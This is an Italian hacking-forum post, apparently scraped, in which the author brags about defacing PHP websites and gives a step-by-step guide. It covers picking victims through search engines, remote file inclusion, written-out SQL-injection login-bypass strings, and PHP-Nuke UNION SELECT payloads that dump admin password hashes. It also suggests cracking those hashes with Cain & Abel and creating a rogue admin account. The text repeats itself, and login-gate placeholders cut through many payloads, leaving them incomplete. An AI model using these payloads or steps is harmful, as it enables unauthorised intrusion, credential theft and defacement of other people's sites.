Ciao a tutti oggi mi sono dato alla pazza gioia, quella di defacciare un paio di siti con estenzione php. Ad esempio
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
ecco l'estenzione index.php adesso vi spiegherò come fare!.Siti in php
Andate su un motore di ricerca e cercate la vostra vittima. Aperto il sito potete utilizzare varie tecniche.
Remote file inclusion
Vi basterà creare una vostra immagine e metterla sul vostro spazio web. Fatto ciò andate sul sito vittima e scrivete:
Sql Injection
Vi basterà loggarvi con 1 di questi dati (naturalmente non tutte funzionano):
UserName: lasciate vuoto
Password:' OR 'Attacco' LIKE 'Att%
UserName:admin' --
Password: lasciate vuoto
UserName: ' OR 'Attacco' > 'A
Password: ' OR 'Attacco' > 'A
UserName: ‘or’’=’
Password: ‘or’’=’
Se nn riuscite ad entrare cosa potrete procedure con dei bug:
vi basterà scrivere
Se il sito ha questo bug vi troverete davanti delle password in md5..Per decriptarle potete andare su
Se questa stringa nn ci mostra niente potete utilizzare quest’altra:
Se nemmeno questa nn ci da risultati possiamo utilizzare questa:
Ancora niente???lasciate perdere!!!
Php nuke
Per defacciare un php nuke possiamo sfruttare alcuni bug (naturalmente se presenti)
Top 10
Come sempre andate su un motore di ricerca e cercate “Powered by Php Nuke†e trovato il sito scrivete:
Se il sito è vulnerabile vi darà la passw in md5.
Search
Se nn risolvete niente con la top10 andate nel modulo search e scrivete:
Se il sito è vulnerabile vi darà la passw in md5.
God admin
Se nemmeno il modulo search vi dà la passw nn vi resta ke provare a diventare Admin. Vi basterà andare qui :
Se cm risultato avremo “Selection from the database failed!" siamo dentro . Quindi ci basterà scrivere:
Al posto di VOSTRONICK e VOSTRAPASSW mettete i vostri dati premete invio e avrete creato il vosto Account cm admin (sempre se il sito è vulnerabile) fatto ciò vi basterà effettutare il login e sarete dentro!!
Andate su un motore di ricerca e cercate la vostra vittima. Aperto il sito potete utilizzare varie tecniche.
Remote file inclusion
Vi basterà creare una vostra immagine e metterla sul vostro spazio web. Fatto ciò andate sul sito vittima e scrivete:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
(Perfavore,
Entra
oppure
Registrati
per vedere i Link!
)Sql Injection
Vi basterà loggarvi con 1 di questi dati (naturalmente non tutte funzionano):
UserName: lasciate vuoto
Password:' OR 'Attacco' LIKE 'Att%
UserName:admin' --
Password: lasciate vuoto
UserName: ' OR 'Attacco' > 'A
Password: ' OR 'Attacco' > 'A
UserName: ‘or’’=’
Password: ‘or’’=’
Se nn riuscite ad entrare cosa potrete procedure con dei bug:
vi basterà scrivere
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
(Perfavore,
Entra
oppure
Registrati
per vedere i Link!
)Se il sito ha questo bug vi troverete davanti delle password in md5..Per decriptarle potete andare su
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
(Perfavore,
Entra
oppure
Registrati
per vedere i Link!
) oppure su Perfavore,
Entra
oppure
Registrati
per vedere i Link!
(Perfavore,
Entra
oppure
Registrati
per vedere i Link!
) (ne esistono tanti di questi siti). Se la passw nn la trovate su qst siti utilizzate un buon bruteforcer (vi consiglio Cain & Abel)Se questa stringa nn ci mostra niente potete utilizzare quest’altra:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Se nemmeno questa nn ci da risultati possiamo utilizzare questa:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Ancora niente???lasciate perdere!!!
Php nuke
Per defacciare un php nuke possiamo sfruttare alcuni bug (naturalmente se presenti)
Top 10
Come sempre andate su un motore di ricerca e cercate “Powered by Php Nuke†e trovato il sito scrivete:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
1,pwd,1,1%20FROM%20nuke_authors (Perfavore,
Entra
oppure
Registrati
per vedere i Link!
1,pwd,1,1%20FROM%20nuke_authors)Se il sito è vulnerabile vi darà la passw in md5.
Search
Se nn risolvete niente con la top10 andate nel modulo search e scrivete:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
(Perfavore,
Entra
oppure
Registrati
per vedere i Link!
') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*Se il sito è vulnerabile vi darà la passw in md5.
God admin
Se nemmeno il modulo search vi dà la passw nn vi resta ke provare a diventare Admin. Vi basterà andare qui :
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Se cm risultato avremo “Selection from the database failed!" siamo dentro . Quindi ci basterà scrivere:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
Al posto di VOSTRONICK e VOSTRAPASSW mettete i vostri dati premete invio e avrete creato il vosto Account cm admin (sempre se il sito è vulnerabile) fatto ciò vi basterà effettutare il login e sarete dentro!!
Fonte: Mia e qualcosina Web.